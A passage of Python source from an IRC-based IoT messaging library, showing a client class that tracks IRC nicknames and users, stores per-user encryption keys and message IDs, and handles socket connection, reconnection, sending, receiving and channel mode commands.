= self.wipe_string_(self.__irc_password)
if self.CONST.irc_default_proxy != None:
self.__irc_proxy_password \
= self.wipe_string_(self.__irc_proxy_password)
sleep(self.CONST.irc_micro_wait)
self.irc_disconnect_()
self.stop_ident_()
if self.__irc_task != None:
sleep(self.CONST.irc_micro_wait)
try:
self.__irc_task.join()
except:
pass
#
# End of stop_IRC_()
def start_ident_(self):
#
self.ident_run = True
self.__ident_task = threading.Thread(target = self.ident_server_)
self.__ident_task.start()
#
# End of start_ident_()
def stop_ident_(self):
#
self.ident_run = False
if self.__ident_task != None:
sleep(self.CONST.irc_micro_wait)
try:
self.__ident_task.join()
except:
pass
def __del__(self):
self.stop_IRC_()
try:
import signal
signal.alarm(0)
except:
pass
def to_log_(self, msg):
if not self.irc_debug:
return
print(msg)
def irciot_protocol_version_(self):
return self.CONST.irciot_protocol_version
def irciot_library_version_(self):
return self.CONST.irciot_library_version
def irc_handler (self, in_compatibility, in_message_pack):
# Warning: interface may be changed
(in_protocol, in_library) = in_compatibility
if not self.irciot_protocol_version_() == in_protocol \
or not self.irciot_library_version_() == in_library:
return False
my_message_pack = in_message_pack
if isinstance(in_message_pack, tuple):
my_message_pack = [ in_message_pack ]
if isinstance(my_message_pack, list):
for my_pack in my_message_pack:
(my_message, my_vuid) = my_pack
self.irc_add_to_queue_( \
self.CONST.irc_queue_output, my_message, \
self.CONST.irc_micro_wait, my_vuid)
return True
def user_handler (self, in_compatibility, in_action, in_vuid, in_params):
# Warning: interface may be changed
(in_protocol, in_library) = in_compatibility
if not self.irciot_protocol_version_() == in_protocol \
or not self.irciot_library_version_() == in_library \
or not isinstance(in_action, int) \
or not isinstance(in_vuid, str) \
or not (isinstance(in_params, str) or in_params == None):
return (False, None)
my_vt = None # VUID Type
my_user = None
my_anon = None
if in_vuid in self.CONST.api_vuid_not_srv:
my_vt = in_vuid
else:
my_re = re.search("{}(\d+)".format( \
self.CONST.api_vuid_cfg), in_vuid)
if my_re:
my_vt = self.CONST.api_vuid_cfg
my_user = self.irc_cfg_get_user_struct_by_vuid_(in_vuid)
if my_user != None:
( my_uid, my_mask, my_chan, my_opt, \
my_ekey, my_bkey, my_lmid, \
my_ekto, my_bkto, my_omid ) = my_user
else:
my_re = re.search("{}(\d+)".format( \
self.CONST.api_vuid_tmp), in_vuid)
if my_re:
my_vt = self.CONST.api_vuid_tmp
my_anon = self.irc_track_get_anons_by_vuid_(in_vuid)
if my_anon != None:
( an_id, an_mask, an_chan, an_opt, \
an_ekey, an_bkey, an_lmid, \
an_ekto, an_bkto, an_omid ) = my_anon
else:
return (False, None)
if in_action == self.CONST.api_GET_LMID:
if my_vt == self.CONST.api_vuid_cfg:
if my_user != None:
return (True, my_lmid)
elif my_vt == self.CONST.api_vuid_tmp:
if my_anon != None:
return (True, an_lmid)
elif in_action == self.CONST.api_SET_LMID:
if my_vt == self.CONST.api_vuid_cfg:
self.irc_track_update_ucfgs_by_vuid_(in_vuid, \
None, None, in_params, None, None, None)
elif my_vt == self.CONST.api_vuid_tmp:
self.irc_track_update_anons_by_vuid_(in_vuid, \
None, None, None, None, None, in_params, \
None, None, None)
elif in_action == self.CONST.api_GET_OMID:
if my_vt == self.CONST.api_vuid_cfg:
if my_user != None:
return (True, my_omid)
elif my_vt == self.CONST.api_vuid_tmp:
if my_anon != None:
return (True, an_omid)
elif in_action == self.CONST.api_SET_OMID:
if my_vt == self.CONST.api_vuid_cfg:
self.irc_track_update_ucfgs_by_vuid_(in_vuid, \
None, None, None, None, None, in_params)
elif my_vt == self.CONST.api_vuid_tmp:
self.irc_track_update_anons_by_vuid_(in_vuid, \
None, None, None, None, None, None, \
None, None, in_params)
elif in_action == self.CONST.api_GET_VUID:
if in_vuid in self.CONST.api_vuid_not_srv:
my_vuid_list = []
for my_nick in self.irc_nicks:
(in_nick, my_mask, my_vuid, my_info) = my_nick
if not self.irc_talk_with_strangers:
if my_vuid[0] != self.CONST.api_vuid_cfg:
continue
if my_vt in [
self.CONST.api_vuid_cfg,
self.CONST.api_vuid_tmp ]:
if my_vuid[0] != my_vt:
continue
my_vuid_list.append(my_vuid)
return (True, my_vuid_list)
elif in_action == self.CONST.api_GET_BKEY:
if my_vt == self.CONST.api_vuid_cfg:
if my_user != None:
return (True, my_bkey)
elif my_vt == self.CONST.api_vuid_tmp:
if my_anon != None:
return (True, an_bkey)
elif in_action == self.CONST.api_SET_BKEY:
if my_vt == self.CONST.api_vuid_cfg:
self.irc_track_update_ucfgs_by_vuid_(in_vuid, \
None, in_params, None, None, None, None)
return (True, None)
elif my_vt == self.CONST.api_vuid_tmp:
self.irc_track_update_anons_by_vuid_(in_vuid, \
None, None, None, None, in_params, \
None, None, None, None)
return (True, None)
elif in_action == self.CONST.api_GET_EKEY:
if my_vt == self.CONST.api_vuid_cfg:
if my_user != None:
return (True, my_ekey)
elif my_vt == self.CONST.api_vuid_tmp:
if my_anon != None:
return (True, an_ekey)
elif in_action == self.CONST.api_SET_EKEY:
if my_vt == self.CONST.api_vuid_cfg:
self.irc_track_update_ucfgs_by_vuid_(in_vuid, \
in_params, None, None, None, None, None)
elif my_vt == self.CONST.api_vuid_tmp:
self.irc_track_update_anons_by_vuid_(in_vuid, \
None, None, None, in_params, None, \
None, None, None, None)
elif in_action == self.CONST.api_GET_EKTO:
if my_vt == self.CONST.api_vuid_cfg:
if my_user != None:
return (True, my_ekto)
elif my_vt == self.CONST.api_vuid_tmp:
if my_anon != None:
return (True, an_ekto)
elif in_action == self.CONST.api_SET_EKTO:
if my_vt == self.CONST.api_vuid_cfg:
self.irc_track_update_ucfgs_by_vuid_(in_vuid, \
None, None, None, in_params, None, None)
elif my_vt == self.CONST.api_vuid_tmp:
self.irc_track_update_anons_by_vuid_(in_vuid, \
None, None, None, None, None, \
None, in_params, None, None)
elif in_action == self.CONST.api_GET_BKTO:
if my_vt == self.CONST.api_vuid_cfg:
if my_user != None:
return (True, my_bkto)
elif my_vt == self.CONST.api_vuid_tmp:
if my_anon != None:
return (True, an_bkto)
elif in_action == self.CONST.api_SET_BKTO:
if my_vt == self.CONST.api_vuid_cfg:
self.irc_track_update_ucfgs_by_vuid_(in_vuid, \
None, None, None, None, in_params, None)
elif my_vt == self.CONST.api_vuid_tmp:
self.irc_track_update_anons_by_vuid_(in_vuid, \
None, None, None, None, None, \
None, None, in_params, None)
elif in_action == self.CONST.api_GET_iMTU:
return (True, self.irc_MTU)
elif in_action == self.CONST.api_GET_iENC:
return (True, self.irc_encoding)
return (False, None)
#
# End of user_handler_()
def irciot_set_locale_(self, in_lang):
if not isinstance(in_lang, str):
return
self.lang = in_lang
my_desc = {}
try:
from PyIRCIoT.irciot_errors \
import irciot_get_common_error_descriptions_
my_desc = irciot_get_common_error_descriptions_(in_lang)
my_dsec = self.validate_descriptions_(my_desc)
if my_desc != {}:
self.errors.update(my_desc)
except:
pass
my_desc = {}
try:
from PyIRCIoT.irciot_errors \
import irciot_get_rfc1459_error_descriptions_
my_desc = irciot_get_rfc1459_error_descriptions_(in_lang)
my_desc = self.validate_descriptions_(my_desc)
if my_desc != {}:
self.errors.update(my_desc)
except:
pass
#
# End of irciot_set_locale_()
def irc_set_password_(self, in_password):
self.__irc_password = self.copy_string_(in_password)
in_password = self.wipe_string_(in_password)
def irc_set_proxy_password_(self, in_password):
self.__irc_proxy_password = self.copy_string_(in_password)
in_password = self.wipe_string_(in_password)
def irc_tolower_(self, in_input):
return in_input.translate(self.CONST.irc_translation)
def irc_tomock_(self, in_input):
return in_input.translate(self.CONST.irc_transmocker)
def irc_get_list_(self, in_input):
if in_input == None:
return []
if isinstance(in_input, list):
return in_input
else:
return [ in_input ]
def is_irc_nick_(self, in_nick):
if not isinstance(in_nick, str):
return False
if len(in_nick) > self.CONST.irc_max_nick_length:
return False
return self.__irc_nick_matcher.match(in_nick)
def is_irc_channel_(self, in_channel):
if not isinstance(in_channel, str):
return False
return self.__irc_channel_matcher.match(in_channel)
def irc_compare_channels_(self, ref_channel, cmp_channel):
if not self.is_irc_channel_(ref_channel):
return False
if not self.is_irc_channel_(cmp_channel):
return False
return (self.irc_tolower_(ref_channel) \
== self.irc_tolower_(cmp_channel))
def irc_compare_nicks_(self, ref_nick, cmp_nick):
if not self.is_irc_nick_(ref_nick):
return False
if not self.is_irc_nick_(cmp_nick):
return False
return (self.irc_tolower_(ref_nick) \
== self.irc_tolower_(cmp_nick))
def irc_define_nick_(self, in_nick):
if not self.is_irc_nick_(in_nick):
return
self.__irc_nick = in_nick
self.irc_nick_old = in_nick
self.irc_nick_base = in_nick
if self.irc_run:
self.irc_send_(self.CONST.cmd_NICK + " " + in_nick)
def irc_get_nick_(self):
return self.__irc_nick
def irc_get_delta_(self):
return self.__delta_time
def irc_get_local_port_(self):
if self.is_ip_port_(self.__irc_local_port):
return self.__irc_local_port
else:
return None
def irc_check_mask_(self, in_from, in_mask):
str_from = self.irc_tolower_(in_from)
str_mask = self.irc_tolower_(in_mask).replace("\\", "\\\\")
for char in ".$|[](){}+":
str_mask = str_mask.replace(char, "\\" + char)
str_mask = str_mask.replace("?", ".")
str_mask = str_mask.replace("*", ".*")
irc_regexp = re.compile(str_mask, re.IGNORECASE)
my_result = irc_regexp.match(str_from)
if my_result != None:
if my_result:
return True
return False
def irc_track_cleanup_anons_(self):
for my_anon in self.irc_anons:
( an_id, an_mask, an_chan, an_opt, \
an_ekey, an_bkey, an_lmid, \
an_ekto, an_bkto, an_omid ) = my_anon
an_vuid = "{:s}{}".format(self.CONST.api_vuid_tmp, an_id)
an_ok = False
for my_nick in self.irc_nicks:
(in_nick, my_mask, my_vuid, my_info) = my_nick
if my_vuid == an_vuid:
an_ok = True
if not an_ok:
self.irc_anons.remove(my_anon)
#
# End of irc_track_cleanup_anons_()
def irc_track_update_ucfgs_by_vuid_(self, in_vuid, \
in_ekey, in_bkey, in_lmid, in_ekto, in_bkto, in_omid):
if not isinstance(in_vuid, str):
return
# Configured users must be setup from the local config,
# but some of the fields may be missing, in this case,
# the needed values will be taken from the network
for my_index, my_ucfg in enumerate(self.irc_users):
( my_id, my_mask, my_channel, my_opt, \
my_ekey, my_bkey, my_lmid, \
my_ekto, my_bkto, my_omid ) = my_ucfg
my_vuid = self.CONST.api_vuid_cfg
my_vuid += "{:d}".format(my_id)
if in_vuid == my_vuid:
# Updating crypto keys only if they are not defined
if my_ekey == None and isinstance(in_ekey, str):
my_ekey = in_ekey
if my_bkey == None and isinstance(in_bkey, str):
my_bkey = in_bkey
if my_ekto == None and isinstance(in_ekto, int):
my_ekto = in_ekto
if my_bkto == None and isinstance(in_bkto, int):
my_bkto = in_bkto
# Only the last message ID can be updated in pipeline
if isinstance(in_lmid, str):
if isinstance(my_lmid, list):
if in_lmid not in my_lmid:
my_lmid.append(in_lmid)
if len(my_lmid) > self.irc_mid_pipeline_size:
del my_lmid[0]
else:
my_lmid = [ in_lmid ]
if isinstance(in_omid, str):
if isinstance(my_omid, list):
if in_omid not in my_omid:
my_omid.append(in_omid)
if len(my_omid) > self.irc_mid_pipeline_size:
del my_omid[0]
else:
my_omid = [ in_omid ]
my_cfgs = ( my_id, my_mask, my_channel, \
my_opt, my_ekey, my_bkey, my_lmid, \
my_ekto, my_bkto, my_omid )
self.irc_users[my_index] = my_cfgs
break
#
# End of irc_track_update_ucfgs_by_vuid_()
def irc_track_update_anons_by_vuid_(self, in_vuid, \
in_mask, in_chan, in_opt, in_ekey, in_bkey, \
in_lmid, in_ekto, in_bkto, in_omid ):
if not isinstance(in_vuid, str):
return
my_re = re.search("{}(\d+)".format( \
self.CONST.api_vuid_tmp), in_vuid)
if my_re:
my_id = my_re.group(1)
else:
return
my_ok = False
for my_index, my_anon in enumerate(self.irc_anons):
( an_id, my_mask, my_chan, my_opt, \
my_ekey, my_bkey, my_lmid, my_ekto, \
my_bkto, my_omid ) = my_anon
if my_id == an_id:
my_ok = True
if isinstance(in_mask, str):
my_mask = in_mask
if self.is_irc_channel_(in_chan):
my_chan = in_chan
if in_opt != None:
my_opt = in_opt
if isinstance(in_ekey, str):
my_ekey = in_ekey
if isinstance(in_bkey, str):
my_bkey = in_bkey
if isinstance(in_lmid, str):
if isinstance(my_lmid, list):
if in_lmid not in my_lmid:
my_lmid.append(in_lmid)
if len(my_lmid) > self.irc_mid_pipeline_size:
del my_lmid[0]
else:
my_lmid = [ in_lmid ]
if isinstance(in_ekto, int):
my_ekto = in_ekto
if isinstance(in_bkto, int):
my_bkto = in_bkto
if isinstance(in_omid, str):
if isinstance(my_omid, list):
if in_omid not in my_omid:
my_omid.append(in_omid)
if len(my_omid) > self.irc_mid_pipeline_size:
del my_omid[0]
else:
my_omid = [ in_omid ]
my_anon = ( an_id, my_mask, my_chan, my_opt, my_ekey, \
my_bkey, my_lmid, my_ekto, my_bkto, my_omid )
self.irc_anons[my_index] = my_anon
break
if not my_ok:
for my_anon in self.irc_anons:
if my_anon[1] == in_mask:
my_ok = True
if not my_ok:
my_lmid = None
my_omid = None
if isinstance(my_lmid, str):
my_lmid = [ in_lmid ]
if isinstance(my_omid, str):
my_omid = [ in_omid ]
self.irc_anons.append( ( my_id, in_mask, \
in_chan, in_opt, in_ekey, in_bkey, my_lmid,
in_ekto, in_bkto, my_omid ) )
#
# End of irc_track_update_anons_by_vuid_()
def irc_track_get_anons_by_vuid_(self, in_vuid):
if not isinstance(in_vuid, str):
return None
my_re = re.search("{}(\d+)".format( \
self.CONST.api_vuid_tmp), in_vuid)
if my_re:
my_id = my_re.group(1)
else:
return None
for my_anon in self.irc_anons:
( an_id, an_mask, an_chan, an_opt, \
an_ekey, an_bkey, an_lmid, \
an_ekto, an_bkto, an_omid ) = my_anon
if my_id == an_id:
return my_anon
return None
#
# End of irc_track_get_anons_by_vuid_()
def irc_track_fast_nick_(self, in_nick, in_mask):
my_ok = True
for my_struct in self.irc_nicks:
if my_struct[0] == in_nick:
my_ok = False
if my_ok:
self.irc_track_add_nick_(in_nick, in_mask, None, None)
#
# End of irc_track_fast_nick_()
def irc_track_add_nick_(self, in_nick, in_mask, in_vuid, in_info):
if not self.is_irc_nick_(in_nick):
return
if in_nick == self.__irc_nick:
return
my_struct = self.irc_track_get_nick_struct_by_nick_(in_nick)
if my_struct == None:
self.irc_nicks.append((in_nick, in_mask, in_vuid, in_info))
else:
self.irc_track_update_nick_(in_nick, in_mask, in_vuid, in_info)
#
# End of irc_track_add_nick_()
def irc_track_update_nick_(self, in_nick, in_mask, in_vuid, in_info):
if not self.is_irc_nick_(in_nick):
return
if in_nick == self.__irc_nick:
return
for my_index, my_struct in enumerate(self.irc_nicks):
(my_nick, my_mask, my_vuid, my_info) = my_struct
# comparing of the masks will be here ...
# self.irc_check_mask_(in_from, in_mask)
if self.irc_compare_nicks_(my_nick, in_nick):
if isinstance(in_mask, str):
my_mask = in_mask
if in_vuid == None:
my_vuid = self.irc_get_vuid_by_mask_(my_mask, self.irc_channel)
if isinstance(in_vuid, str):
my_vuid = in_vuid
if isinstance(in_info, str):
my_info = in_info
self.irc_nicks[my_index] = (in_nick, my_mask, my_vuid, my_info)
if self.irc_talk_with_strangers:
self.irc_track_update_anons_by_vuid_(my_vuid, \
my_mask, self.irc_channel, \
None, None, None, None, None, None, None)
break
#
# End of irc_track_update_nick_()
def irc_track_clear_anons_(self):
self.irc_anons = []
def irc_track_clear_nicks_(self):
self.irc_nicks = []
def irc_track_delete_nick_(self, in_nick):
if not self.is_irc_nick_(in_nick):
return
for my_struct in self.irc_nicks:
(my_nick, my_mask, my_vuid, my_info) = my_struct
if self.irc_compare_nicks_(my_nick, in_nick):
self.irc_nicks.remove(my_struct)
if self.irc_talk_with_strangers:
self.irc_track_cleanup_anons_()
break
#
# End of irc_track_delete_nick_()
def irc_track_get_nick_struct_(self, in_position):
try:
my_struct = self.irc_nicks[in_position]
except:
my_struct = None
return my_struct
def irc_track_get_nick_struct_by_nick_(self, in_nick):
if not self.is_irc_nick_(in_nick):
return None
for my_struct in self.irc_nicks:
(my_nick, my_mask, my_vuid, my_info) = my_struct
if self.irc_compare_nicks_(my_nick, in_nick):
return my_struct
return None
def irc_track_get_nick_struct_by_vuid_(self, in_vuid):
if not isinstance(in_vuid, str):
return None
for my_struct in self.irc_nicks:
(my_nick, my_mask, my_vuid, my_info) = my_struct
if my_vuid == in_vuid:
return my_struct
return None
def irc_track_get_nick_by_vuid_(self, in_vuid):
if not isinstance(in_vuid, str):
return None
for my_struct in self.irc_nicks:
(my_nick, my_mask, my_vuid, my_info) = my_struct
if my_vuid == in_vuid:
return my_nick
return None
def irc_track_clarify_nicks_(self):
for my_struct in self.irc_nicks:
(my_nick, my_mask, my_vuid, my_info) = my_struct
if my_mask == None or my_info == None:
self.irc_whois_nick_(my_nick)
if my_mask == None:
my_mask = ""
if my_info == None:
my_info = ""
self.irc_track_update_nick_(my_nick, my_mask, my_vuid, my_info)
break
#
# End of irc_track_clarify_nicks_()
def irc_cfg_get_user_mask_(self, in_position):
if not isinstance(in_position, int):
return None
try:
my_user = self.irc_users[ in_position ]
( my_id, my_mask, my_chan, my_opt, \
my_ekey, my_bkey, my_lmid, my_ekto, \
my_bkto, my_omid ) = my_user
return my_mask
except:
return None
#
# End of irc_cfg_get_user_mask_()
def irc_cfg_get_user_struct_(self, in_position):
if not isinstance(in_position, int):
return None
try:
my_struct = self.irc_users[ in_position ]
return my_struct
except:
return None
#
# End of irc_cfg_get_user_struct_()
def irc_cfg_get_vuid_(self, in_position):
if not isinstance(in_position, int):
return None
try:
my_user = self.irc_users[ in_position ]
( my_id, my_mask, my_chan, my_opt, \
my_ekey, my_bkey, my_lmid, my_ekto, \
my_bkto, my_omid ) = my_user
return "{:s}{:d}".format(self.CONST.api_vuid_cfg, my_id)
except:
return None
#
# End of irc_cfg_get_vuid_()
def irc_cfg_get_user_struct_by_vuid_(self, in_vuid):
if not isinstance(in_vuid, str):
return None
for my_user in self.irc_users:
if in_vuid == "{:s}{:d}".format( \
self.CONST.api_vuid_cfg, my_user[0]):
return my_user
return None
#
# End of irc_cfg_get_user_strcut_by_vuid_()
def irc_cfg_check_user_(self, in_from, in_channel, \
irciot_parameters = None):
if not self.is_irc_channel_(in_channel):
return None
in_opt = None
in_ekey = None
in_bkey = None
in_lmid = None
in_ekto = None
in_bkto = None
in_omid = None
if irciot_parameters != None:
( in_opt, in_ekey, in_bkey, in_lmid, \
in_ekto, in_bkto, in_omid ) = irciot_parameters
for my_user in self.irc_users:
( my_uid, my_mask, my_chan, my_opt, \
my_ekey, my_bkey, my_lmid, my_ekto, \
my_bkto, my_omid ) = my_user
if in_channel == "*" or \
self.irc_compare_channels_(in_channel, my_chan):
if self.irc_check_mask_(in_from, my_mask):
return "{:s}{:d}".format(self.CONST.api_vuid_cfg, my_uid)
return None
#
# End of irc_cfg_check_user_()
def irc_get_unique_temporal_vuid_(self, in_mask):
max_id = self.irc_last_temporal_vuid
tmp_id = random.randint(max_id + 1, max_id + 100)
my_id = max_id
for my_nick_struct in self.irc_nicks:
(my_nick, my_mask, my_vuid, my_info) = my_nick_struct
if not isinstance(my_vuid, str):
continue
my_re = re.search("{}(\d+)".format( \
self.CONST.api_vuid_tmp), my_vuid)
if my_re:
if my_mask == in_mask:
return my_vuid
my_id = my_re.group(1)
my_id = int(my_id)
if my_id > max_id:
max_id = my_id
self.irc_last_temporal_vuid = tmp_id
return "{:s}{:d}".format(self.CONST.api_vuid_tmp, tmp_id)
def irc_get_vuid_by_mask_(self, in_mask, in_channel):
if not self.is_irc_channel_(in_channel):
return None
my_vuid = self.irc_cfg_check_user_(in_mask, in_channel)
if my_vuid == None and self.irc_talk_with_strangers:
my_vuid = self.irc_get_unique_temporal_vuid_(in_mask)
return my_vuid
def irc_get_vuid_type_(self, in_vuid):
if isinstance(in_vuid, str):
if len(in_vuid) > 0:
return in_vuid[0]
return None
def irc_get_useropts_from_user_struct_(self, in_user_struct):
if not isinstance(in_user_struct, tuple):
return []
if len(in_user_struct) < 4:
return []
my_opts = in_user_struct[3]
if not isinstance(my_opts, list):
my_opts = [ my_opts ]
return my_opts
def irc_disconnect_(self):
try:
self.irc.shutdown(2)
except:
pass
self.stop_ident_()
self.irc_track_clear_nicks_()
self.irc_track_clear_anons_()
try:
self.irc.close()
except:
pass
#
# End of irc_disconnect_()
def irc_reconnect_(self):
if not self.irc_run:
return
self.irc_disconnect_()
self.to_log_(self.errors[self.CONST.err_CLOSED] + ", " \
+ self.errors[self.CONST.err_RECONN] + "IRC" \
+ self.errors[self.CONST.err_TRY].format( \
self.__irc_recon) + " ...")
my_mult = self.__irc_recon
if self.__join_retry > self.__join_retry_max:
my_mult = 1
sleep(self.CONST.irc_first_wait * my_mult)
self.__irc_recon += 1
if self.__irc_recon > self.CONST.irc_recon_steps:
self.__irc_recon = 1
self.__irc_silence = 0
self.irc = self.irc_socket_(self.irc_server)
def irc_send_(self, irc_out):
if not isinstance(irc_out, str):
return -1
try:
if irc_out == "":
return -1
if self.irc_debug:
self.to_log_(self.errors[self.CONST.err_SENDTO] + "IRC: [" \
+ irc_out.replace('\r','\\r').replace('\n','\\n') + "\\n]")
self.irc.send(bytes(irc_out + "\n", self.irc_encoding))
sleep(self.CONST.irc_micro_wait)
irc_out = ""
return 0
except socket.error:
self.to_log_("socket.error in irc_send_() ...")
return -1
except ValueError:
self.to_log_("ValueError in irc_send_() ...")
return -1
except:
return -1
#
# End of irc_send_()
def irc_recv_(self, recv_timeout):
try:
time_in_recv = datetime.datetime.now()
ready = select.select([self.irc], [], [], 0)
my_timerest = recv_timeout
while ready[0] == [] and my_timerest > 0 and self.irc_run:
my_timeout = my_timerest % self.CONST.irc_latency_wait
if my_timeout == 0:
my_timeout = self.CONST.irc_latency_wait
ready = select.select([self.irc], [], [], my_timeout)
if not self.irc_run:
return (-1, "", 0)
if not self.__irc_queue[self.CONST.irc_queue_output].empty():
break
my_timerest -= my_timeout
time_out_recv = datetime.datetime.now()
delta_time_in = self.td2ms_(time_out_recv - time_in_recv)
delta_time = self.CONST.irc_default_wait
if recv_timeout < self.CONST.irc_default_wait:
delta_time = 0
if delta_time_in < recv_timeout:
delta_time = recv_timeout - delta_time_in
if delta_time_in < 0:
delta_time = 0
if ready[0] and self.irc_run:
irc_input = self.irc.recv(self.CONST.irc_buffer_size \
).decode(self.irc_encoding, 'ignore')
if irc_input != "":
if self.irc_debug:
self.to_log_("Received from IRC: [" \
+ irc_input.replace('\r',"\\r").replace('\n',"\\n\n").rstrip() + "]")
return (0, irc_input, delta_time)
return (-1, "", delta_time)
return (0, "", delta_time)
except socket.error:
return (-1, "", 0)
except ValueError:
return (-1, "", 0)
#
# End of irc_recv_()
def irc_pong_(self, irc_input):
irc_string = irc_input.split(":")
ret = self.irc_send_("{} {}\r".format( \
self.CONST.cmd_PONG, irc_string[1]))
return ret
def irc_quit_(self):
ret = self.irc_send_("{} :{}\r".format( \
self.CONST.cmd_QUIT, self.irc_quit))
sleep(self.CONST.irc_latency_wait)
return ret
def irc_umode_(self, in_channel, in_nicks, in_change, in_umode):
if not self.is_irc_channel_(in_channel):
return None
if isinstance(in_nicks, str):
my_nicks = [ in_nicks ]
elif isinstance(in_nicks, list):
my_nicks = in_nicks
else:
return None
my_str = ''
for my_nick in my_nicks:
if not self.is_irc_nick_(my_nick):
return None
my_str += in_umode
for my_nick in my_nicks:
my_str += ' ' + my_nick
ret = self.irc_send_("{} {} {}{}\r\n".format( \
self.CONST.cmd_MODE, in_channel, in_change, my_str))
return ret
#
# End of irc_umode_()
def irc_op_(self, in_channel, in_nicks):
return self.irc_umode_(in_channel, in_nicks, \
self.CONST.irc_mode_add, self.CONST.irc_umode_op)
def irc_deop_(self, in_channel, in_nicks):
return self.irc_umode_(in_channel, in_nicks, \
self.CONST.irc_mode_del, self.CONST.irc_umode_op)
def irc_voice_(self, in_channel, in_nicks):
return self.irc_umode_(in_channel, in_nicks, \
self.CONST.irc_mode_add, self.CONST.irc_umode_voice)
def irc_devoice_(self, in_channel, in_nicks):
return self.irc_umode_(in_channel, in_nicks, \
self.CONST.irc_mode_del, self.CONST.irc_umode_voice)
def irc_extract_single_(self, in_string):
try:
irc_single = in_string.split()[3]
except:
return None
return irc_single
def irc_extract_nick_mask_(self, in_string):
try:
my_mask = in_string.split(' ', 1)[0][1:]
my_nick = my_mask.split('!', 1)[0]
except:
my_mask = "!@"
my_nick = ""
return (my_nick, my_mask)
def irc_extract_message_(self, in_string):
try:
irc_msg = in_string.split( \
self.CONST.cmd_PRIVMSG, 1)[1].split(':', 1)[1]
return irc_msg.strip()
except:
return None
def irc_extract_code_params_(self, in_string):
try:
my_out = ""
my_idx = 0
for my_item in in_string.split(' '):
if my_idx == 1 and len(my_item) != 3:
return None
if my_idx > 2:
if my_out != "":
my_out += " "
my_out += my_item
my_idx += 1
return my_out
except:
return None
def irc_whois_nick_(self, in_nick):
if not self.is_irc_nick_(in_nick):
return -1
ret = self.irc_send_(self.CONST.cmd_WHOIS + " " + in_nick)
return ret
def irc_who_channel_(self, in_channel):
if not self.is_irc_channel_(in_channel):
return -1
ret = self.irc_send_(self.CONST.cmd_WHO + " " + in_channel)
return ret
def irc_random_user_(self):
return ''.join( \
random.choice(self.CONST.irc_ascii_lowercase) \
for i in range(random.randint(3, 8)))
def irc_random_nick_(self, in_nick, in_force = False):
if not self.is_irc_nick_(in_nick):
return -1
random.seed()
irc_nick = self.irc_tomock_(in_nick)
if irc_nick == in_nick:
irc_nick = "{}{:d}".format(in_nick, random.randint(0, 999))
if self.__join_retry > 2 or in_force:
nick_length = random.randint(2, self.irc_nick_length)
irc_nick = random.choice(self.CONST.irc_nick_first_char)
irc_nick += ''.join( \
random.choice(self.CONST.irc_nick_chars) \
for i in range(nick_length - 1))
ret = self.irc_send_(self.CONST.cmd_NICK + " " + irc_nick)
self.irc_nick_try = irc_nick
if ret == 0:
self.irc_nick_old = self.__irc_nick
self.__irc_nick = irc_nick
return ret
#
# End of irc_random_nick_()
def irc_socket_(self, in_server_name):
try:
my_server_ip = socket.gethostbyname(in_server_name)
if self.is_ipv6_address_(my_server_ip):
my_af_inet = socket.AF_INET6
else:
my_af_inet = socket.AF_INET
irc_socket = socket.socket(my_af_inet, socket.SOCK_STREAM)
if self.irc_ssl:
irc_socket = ssl.wrap_socket(irc_socket)
except socket.error:
self.to_log_("Cannot create socket for IRC")
return None
self.irc_server_ip = my_server_ip
self.update_irc_host_()
return irc_socket
def irc_connect_(self, in_server_ip, in_port):
if self.irc_ident:
self.start_ident_()
try:
self.irc.connect((in_server_ip, in_port))
except:
return
self.__irc_local_port = self.irc.getsockname()[1]
# self.irc.setblocking(False)
def irc_check_queue_(self, in_queue_id):
old_queue_lock = self.__irc_queue_lock[in_queue_id]
if not old_queue_lock:
check_queue = self.__irc_queue[in_queue_id]
self.__irc_queue_lock[in_queue_id] = True
if not check_queue.empty():
(irc_message, irc_wait, irc_vuid) = check_queue.get()
self.__irc_queue_lock[in_queue_id] = old_queue_lock
return (irc_message, irc_wait, irc_vuid)
else:
if old_queue_lock:
check_queue.task_done()
self.__irc_queue_lock[in_queue_id] = old_queue_lock
try:
sleep(self.CONST.irc_micro_wait)
except:
pass
return ("", self.CONST.irc_default_wait, self.CONST.api_vuid_all)
#
# End of irc_check_queue_()
def irc_add_to_queue_(self, in_queue_id, in_message, in_wait, in_vuid):
old_queue_lock = self.__irc_queue_lock[in_queue_id]
self.__irc_queue_lock[in_queue_id] = True
self.__irc_queue[in_queue_id].put((in_message, in_wait, in_vuid))
self.__irc_queue_lock[in_queue_id] = old_queue_lock
def irc_check_and_restore_nick_(self):
if self.__irc_nick != self.irc_nick_base:
if self.irc_send_(self.CONST.cmd_NICK \
+ " " + self.irc_nick_base) != -1:
self.irc_nick_old = self.__irc_nick
self.__irc_nick = self.irc_nick_base
def irc_umode_by_nick_mask_(self, in_nick, in_mask, in_vuid):
if self.irc_get_vuid_type_(in_vuid) == self.CONST.api_vuid_cfg:
my_user = self.irc_cfg_get_user_struct_by_vuid_(in_vuid)
if my_user == None:
return
my_opts = self.irc_get_useropts_from_user_struct_(my_user)
if self.CONST.irc_aop in my_opts:
self.irc_op_(self.irc_channel, in_nick)
if self.CONST.irc_avo in my_opts:
self.irc_voice_(self.irc_channel, in_nick)
# CLIENT Hooks:
def func_feature_network_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
if in_string not in [ "", None ]:
my_string = in_string
my_max = self.CONST.irc_max_network_name_length
if len(in_string) > my_max:
my_string = in_string[:my_max]
if not self.CONST.irc_default_network_tag in my_string:
self.to_log_(self.errors[self.CONST.err_NOT_IRCIOT_NET].format( \
my_string))
self.irc_network_name = my_string
return (in_ret, in_init, in_wait)
def func_feature_wallchops_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
self.__wallchops = True
return (in_ret, in_init, in_wait)
def func_feature_topiclen_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
try:
my_len = int(in_string)
if my_len > 0 and my_len < self.CONST.irc_max_topic_length:
self.irc_topic_length = my_len
except:
pass
return (in_ret, in_init, in_wait)
def func_feature_nicklen_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
try:
my_len = int(in_string)
if my_len > 0 and my_len < self.CONST.irc_max_nick_length:
self.irc_nick_length = my_len
except:
pass
return (in_ret, in_init, in_wait)
def func_feature_whox_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
self.__whox = True
return (in_ret, in_init, in_wait)
# incomplete
def func_featurelist_(self, in_args):
''' RPL_ISUPPORT handler '''
(in_string, in_ret, in_init, in_wait) = in_args
my_string = self.irc_extract_code_params_(in_string)
if my_string == None:
return (in_ret, in_init, in_wait)
my_string = my_string.split(':')[0]
for my_item in my_string.split(' '):
